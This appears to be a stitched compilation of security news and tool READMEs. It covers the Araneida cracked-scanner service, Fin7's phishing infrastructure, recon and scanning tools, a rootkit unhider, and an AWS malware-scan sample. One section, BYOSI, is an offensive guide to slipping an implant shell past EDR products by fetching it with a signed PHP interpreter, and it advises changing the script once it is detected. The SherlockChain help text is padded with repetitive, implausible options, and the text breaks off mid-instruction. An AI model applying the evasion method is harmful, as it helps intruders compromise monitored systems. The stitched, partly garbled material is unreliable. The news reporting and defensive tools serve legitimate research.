Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.
Araneida Scanner.
Cyber threat analysts at Silent Push said they recently received reports from a partner organization that identified an aggressive scanning effort against their website using an Internet address previously associated with a campaign by FIN7, a notorious Russia-based hacking group.
But on closer inspection they discovered the address contained an HTML title of "Araneida Customer Panel," and found they could search on that text string to find dozens of unique addresses hosting the same service.
It soon became apparent that Araneida was being resold as a cloud-based service using a cracked version of Acunetix, allowing paying customers to conduct offensive reconnaissance on potential target websites, scrape user data, and find vulnerabilities for exploitation.
Silent Push also learned Araneida bundles its service with a robust proxy offering, so that customer scans appear to come from Internet addresses that are randomly selected from a large pool of available traffic relays.
The makers of Acunetix, Texas-based application security vendor Invicti Security, confirmed Silent Push's findings, saying someone had figured out how to crack the free trial version of the software so that it runs without a valid license key.
"We have been playing cat and mouse for a while with these guys," said Matt Sciberras, chief information security officer at Invicti.
Silent Push said Araneida is being advertised by an eponymous user on multiple cybercrime forums. The service's Telegram channel boasts nearly 500 subscribers and explains how to use the tool for malicious purposes.
In a "Fun Facts" list posted to the channel in late September, Araneida said their service was used to take over more than 30,000 websites in just six months, and that one customer used it to buy a Porsche with the payment card data ("dumps") they sold.
Araneida Scanner's Telegram channel bragging about how customers are using the service for cybercrime.
"They are constantly bragging with their community about the crimes that are being committed, how it's making criminals money," said Zach Edwards, a senior threat researcher at Silent Push. "They are also selling bulk data and dumps which appear to have been acquired with this tool or due to vulnerabilities found with the tool."
Silent Push also found a cracked version of Acunetix was powering at least 20 instances of a similar cloud-based vulnerability testing service catering to Mandarin speakers, but they were unable to find any apparently related sales threads about them on the dark web.
Rumors of a cracked version of Acunetix being used by attackers surfaced in June 2023 on Twitter/X, when researchers first posited a connection between observed scanning activity and Araneida.
According to an August 2023 report (PDF) from the U.S. Department of Health and Human Services (HHS), Acunetix (presumably a cracked version) is among several tools used by APT 41, a prolific Chinese state-sponsored hacking group.
Silent Push notes that the website where Araneida is being sold, araneida[.]co, first came online in February 2023. But a review of this Araneida nickname on the cybercrime forums shows they have been active in the criminal hacking scene since at least 2018.
A search in the threat intelligence platform Intel 471 shows a user by the name Araneida promoted the scanner on two cybercrime forums since 2022, including Breached and Nulled. In 2022, Araneida told fellow Breached members they could be reached on Discord at the username "Ornie#9811."
According to Intel 471, this same Discord account was advertised in 2019 by a person on the cybercrime forum Cracked who used the monikers "ORN" and "ori0n." The user "ori0n" mentioned in several posts that they could be reached on Telegram at the username "@sirorny."
Orn advertising Araneida Scanner in Feb. 2023 on the forum Cracked. Image: Ke-la.com.
The Sirorny Telegram identity also was referenced as a point of contact for a current user on the cybercrime forum Nulled who is selling website development services, and who references araneida[.]co as one of their projects. That user, "Exorn," has posts dating back to August 2018.
In early 2020, Exorn promoted a website called "orndorks[.]com," which they described as a service for automating the scanning for web-based vulnerabilities. A passive DNS lookup on this domain at DomainTools.com shows that its email records pointed to the address ori0nbusiness@protonmail.com.
Constella Intelligence, a company that tracks information exposed in data breaches, finds this email address was used to register an account at Breachforums in July 2024 under the nickname "Ornie." Constella also finds the same email registered at the website netguard[.]codes in 2021 using the password "ceza2003" [full disclosure: Constella is currently an advertiser on KrebsOnSecurity].
A search on the password ceza2003 in Constella finds roughly a dozen email addresses that used it in an exposed data breach, most of them featuring some variation on the name "altugsara," including altugsara321@gmail.com. Constella further finds altugsara321@gmail.com was used to create an account at the cybercrime community RaidForums under the username "ori0n," from an Internet address in Istanbul.
According to DomainTools, altugsara321@gmail.com was used in 2020 to register the domain name altugsara[.]com. Archive.org's history for that domain shows that in 2021 it featured a website for a then 18-year-old Altuğ Şara from Ankara, Turkey.
Archive.org's recollection of what altugsara dot com looked like in 2021.
LinkedIn finds this same altugsara[.]com domain listed in the "contact info" section of a profile for an Altug Sara from Ankara, who says he has worked the past two years as a senior software developer for a Turkish IT firm called Bilitro Yazilim.
Neither Altug Sara nor Bilitro Yazilim responded to requests for comment.
Invicti's website states that it has offices in Ankara, but the company's CEO said none of their employees recognized either name.
"We do have a small team in Ankara, but as far as I know we have no connection to the individual other than the fact that they are also in Ankara," Invicti CEO Neil Roseman told KrebsOnSecurity.
Researchers at Silent Push say despite Araneida using a seemingly endless supply of proxies to mask the true location of its users, it is a fairly "noisy" scanner that will kick off a large volume of requests to various API endpoints, and make requests to random URLs associated with different content management systems.
Whatβs more, the cracked version of Acunetix being resold to cybercriminals invokes legacy Acunetix SSL certificates on active control panels, which Silent Push says provides a solid pivot for finding some of this infrastructure, particularly from the Chinese threat actors.
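For defenders, a hedged illustration of that pivot: inspecting the certificate served by a suspected control panel. The hostname below is a placeholder, not an indicator from the research.
# Hypothetical host: print the subject and issuer of the certificate presented by a suspected panel
openssl s_client -connect suspect-panel.example:443 -servername suspect-panel.example </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer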
Further reading: Silent Push's research on Araneida Scanner.
secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and is designed to improve productivity for pentesters and security researchers.
- Curated list of commands
- Unified input options
- Unified output schema
- CLI and library usage
- Distributed options with Celery
- Scales from simple tasks to complex workflows
secator integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress Security Scanner | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).
Pipx: pipx install secator
Pip: pip install secator
Bash: wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker: docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount (-v) is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator uses external tools, so you might need to install the languages used by those tools, assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool, which should work on all systems supporting apt:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator ships with a minimal set of dependencies.
There are several addons available for secator:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
And more... To list all the tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
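As a rough illustration of the unified task syntax shown above, here is a hedged sequence chaining individual tasks by hand against the same demo target; exact arguments may vary by secator version.
# Sketch: enumerate subdomains, probe HTTP, then run a vulnerability scan
secator x subfinder vulnweb.com
secator x httpx http://testphp.vulnweb.com
secator x nuclei http://testphp.vulnweb.com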
To go deeper with secator, check out:
- Our complete documentation
- Our getting started tutorial video
- Our Medium post
- Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
A tool to make an LKM rootkit visible again.
It works by getting the memory address of a rootkit's "show_module" function, for example, and using that address to call the function, adding the rootkit back to lsmod and making it possible to remove it.
On recent kernels we can obtain the function address very simply by reading /sys/kernel/tracing/available_filter_functions_addrs; however, that file is only available from kernel 6.5 onwards.
An alternative is to scan kernel memory for the function, then add the rootkit back to lsmod so it can be removed.
In summary, this LKM abuses the fact that some LKM rootkits ship with the functionality to become visible again.
Note: there is another trick for removing/defusing an LKM rootkit, but it will be covered in research yet to be published.
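A hedged sketch of the kernel >= 6.5 lookup described above; "show_module" is a placeholder for whatever visibility helper the targeted rootkit exports.
# Requires kernel >= 6.5 with tracing enabled; the symbol name is a placeholder
sudo grep show_module /sys/kernel/tracing/available_filter_functions_addrs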
Evade EDRs the simple way: by not touching any of the APIs they hook.
I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.
Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.
Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.
This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.
The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):
1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3.) Following this, it executes the implant or shell using the whitelisted PHP binary (which exempts it from most restrictions that would otherwise prevent the binary from running in the first place).
With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.
I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection; I am only bringing it to everyone's attention.
A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.
It appears as though MS Defender is now flagging the PHP script as malicious, but it still fully allows the PowerShell script to execute. So, modify the PHP script.
Hello Sentinel One :) You might want to make sure that you are making links, not embeds.
The Russia-based cybercrime group dubbed "Fin7," known for phishing and malware attacks that have cost victim organizations an estimated $3 billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024, setting up thousands of websites mimicking a range of media and technology companies, with the help of Stark Industries Solutions, a sprawling hosting provider that is a persistent source of cyberattacks against enemies of Russia.
In May 2023, the U.S. attorney for Washington state declared "Fin7 is an entity no more," after prosecutors secured convictions and prison sentences against three men found to be high-level Fin7 hackers or managers. This was a bold declaration against a group that the U.S. Department of Justice described as a criminal enterprise with more than 70 people organized into distinct business units and teams.
The first signs of Fin7βs revival came in April 2024, when Blackberry wrote about an intrusion at a large automotive firm that began with malware served by a typosquatting attack targeting people searching for a popular free network scanning tool.
Now, researchers at security firm Silent Push say they have devised a way to map out Fin7βs rapidly regrowing cybercrime infrastructure, which includes more than 4,000 hosts that employ a range of exploits, from typosquatting and booby-trapped ads to malicious browser extensions and spearphishing domains.
Silent Push said it found Fin7 domains targeting or spoofing brands including American Express, Affinity Energy, Airtable, Alliant, Android Developer, Asana, Bitwarden, Bloomberg, Cisco (Webex), CNN, Costco, Dropbox, Grammarly, Google, Goto.com, Harvard, Lexis Nexis, Meta, Microsoft 365, Midjourney, Netflix, Paycor, Quickbooks, Quicken, Reuters, Regions Bank Onepass, RuPay, SAP (Ariba), Trezor, Twitter/X, Wall Street Journal, Westlaw, and Zoom, among others.
Zach Edwards, senior threat analyst at Silent Push, said many of the Fin7 domains are innocuous-looking websites for generic businesses that sometimes include text from default website templates (the content on these sites often has nothing to do with the entityβs stated business or mission).
Edwards said Fin7 does this to "age" the domains and to give them a positive or at least benign reputation before they're eventually converted for use in hosting brand-specific phishing pages.
"It took them six to nine months to ramp up, but ever since January of this year they have been humming, building a giant phishing infrastructure and aging domains," Edwards said of the cybercrime group.
In typosquatting attacks, Fin7 registers domains that are similar to those for popular free software tools. Those look-alike domains are then advertised on Google so that sponsored links to them show up prominently in search results, usually above the legitimate source of the software in question.
A malicious site spoofing FreeCAD showed up prominently as a sponsored result in Google search results earlier this year.
According to Silent Push, the software currently being targeted by Fin7 includes 7-zip, PuTTY, ProtectedPDFViewer, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
In May 2024, security firm eSentire warned that Fin7 was spotted using sponsored Google ads to serve pop-ups prompting people to download phony browser extensions that install malware. Malwarebytes blogged about a similar campaign in April, but did not attribute the activity to any particular group.
A pop-up at a Thomson Reuters typosquatting domain telling visitors they need to install a browser extension to view the news content.
Edwards said Silent Push discovered the new Fin7 domains after hearing from an organization that was targeted by Fin7 in years past and suspected the group was once again active. Searching for hosts that matched Fin7's known profile revealed just one active site. But Edwards said that one site pointed to many other Fin7 properties at Stark Industries Solutions, a large hosting provider that materialized just two weeks before Russia invaded Ukraine.
As KrebsOnSecurity wrote in May, Stark Industries Solutions is being used as a staging ground for wave after wave of cyberattacks against Ukraine that have been tied to Russian military and intelligence agencies.
"FIN7 rents a large amount of dedicated IP on Stark Industries," Edwards said. "Our analysts have discovered numerous Stark Industries IPs that are solely dedicated to hosting FIN7 infrastructure."
Fin7 once famously operated behind fake cybersecurity companies, with names like Combi Security and Bastion Secure, which they used for hiring security experts to aid in ransomware attacks. One of the new Fin7 domains identified by Silent Push is cybercloudsec[.]com, which promises to "grow your business with our IT, cyber security and cloud solutions."
The fake Fin7 security firm Cybercloudsec.
Like other phishing groups, Fin7 seizes on current events, and at the moment it is targeting tourists visiting France for the Summer Olympics later this month. Among the new Fin7 domains Silent Push found are several sites phishing people seeking tickets at the Louvre.
"We believe this research makes it clear that Fin7 is back and scaling up quickly," Edwards said. "It's our hope that the law enforcement community takes notice of this and puts Fin7 back on their radar for additional enforcement actions, and that quite a few of our competitors will be able to take this pool and expand into all or a good chunk of their infrastructure."
Further reading:
Stark Industries Solutions: An Iron Hammer in the Cloud.
A 2022 deep dive on Fin7 from the Swiss threat intelligence firm Prodaft (PDF).
Reconnaissance is the first phase of penetration testing, meaning gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and Wayback crawling machine.
- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers
~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt
A detailed usage guide is available in the Usage section of the Wiki.
An index of options is given below:
Ashok can be launched using a lightweight Python3.8-Alpine Docker image.
$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help
Subdomain Extraction:
Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.
Site-wide Link Discovery:
Collects all links throughout the website based on the provided whitelist and the specified max_depth.
Form and Input Extraction:
Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.
XSS Scanning:
Note:
The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.
Note:
This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css", ".js", ".mp4", ".zip", "png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"). You can customize this list to better suit your needs by editing the setting.json file.
$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py
You can use this address in the Get URL section
http://testphp.vulnweb.com
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:
- Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
- Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
- Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
- AI Features: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
- Framework Integration: The --truffle and --truffle-build-directory options facilitate the integration of SherlockChain into popular development frameworks like Truffle.

The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
- --detect, --exclude-detectors
- --report-format, --report-output, --report-*
- --filter-*
- --ai-*
- --truffle, --truffle-build-directory
- --compile, --list-detectors, --list-detectors-info
By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
Num | Detector | What it Detects | Impact | Confidence |
---|---|---|---|---|
1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
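As a hedged illustration only, a run combining the flags and AI detectors documented above might look like the following; the contract path is a placeholder, and exact flag behavior should be confirmed against sherlockchain --help.
# Hypothetical invocation: run two AI detectors and write a Markdown report
sherlockchain contracts/MyToken.sol --detect ai-anomaly-detection,ai-vulnerability-prediction --report-format markdown --report-output report.md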
It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.
Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.
The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.
This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.
AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.
Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.
AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.
The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.
AWS Security Hub enabled. If not, please check this documentation.
Warning
Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.
Create a Cloud9 environment with an Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 ships node v16, which is no longer supported since 2023-09-11.
git clone https://github.com/aws-samples/drs-malware-scan
cd drs-malware-scan
sh check_loggroup.sh
Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment
npm install
cdk bootstrap
cdk deploy --all
Note
The solution is made of 2 stacks:
- DrsMalwareScanStack: deploys all resources needed for the malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
- ScanReportStack: deploys the resources needed for reporting (AWS Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack

If you want to deploy both stacks you can run cdk deploy --all
All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function; look for the /aws/lambda/DrsMalwareScanStack-* pattern.
The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.
The SQS FIFO queues can be monitored using the Messages available and Messages in flight metrics in the AWS SQS console.
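A hedged way to read those same metrics from the CLI; the queue URL below is a placeholder for the FIFO queue the stack deploys. ApproximateNumberOfMessages corresponds to "Messages available" and ApproximateNumberOfMessagesNotVisible to "Messages in flight".
# Hypothetical queue URL; replace with the FIFO queue deployed by the stack
aws sqs get-queue-attributes --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/DrsMalwareScan.fifo --attribute-names ApproximateNumberOfMessages ApproximateNumberOfMessagesNotVisible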
The DRS Volume Annotations DynamoDB table keeps track of the status of each malware scan operation.
Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan
In order to analyze logs from Amazon GuardDuty malware scan operations, you can check the /aws/guardduty/malware-scan-events Amazon CloudWatch log group. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.
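For example, assuming AWS CLI v2 and suitable credentials, you can follow that log group from a terminal:
# Tail the GuardDuty malware scan event logs named above (AWS CLI v2)
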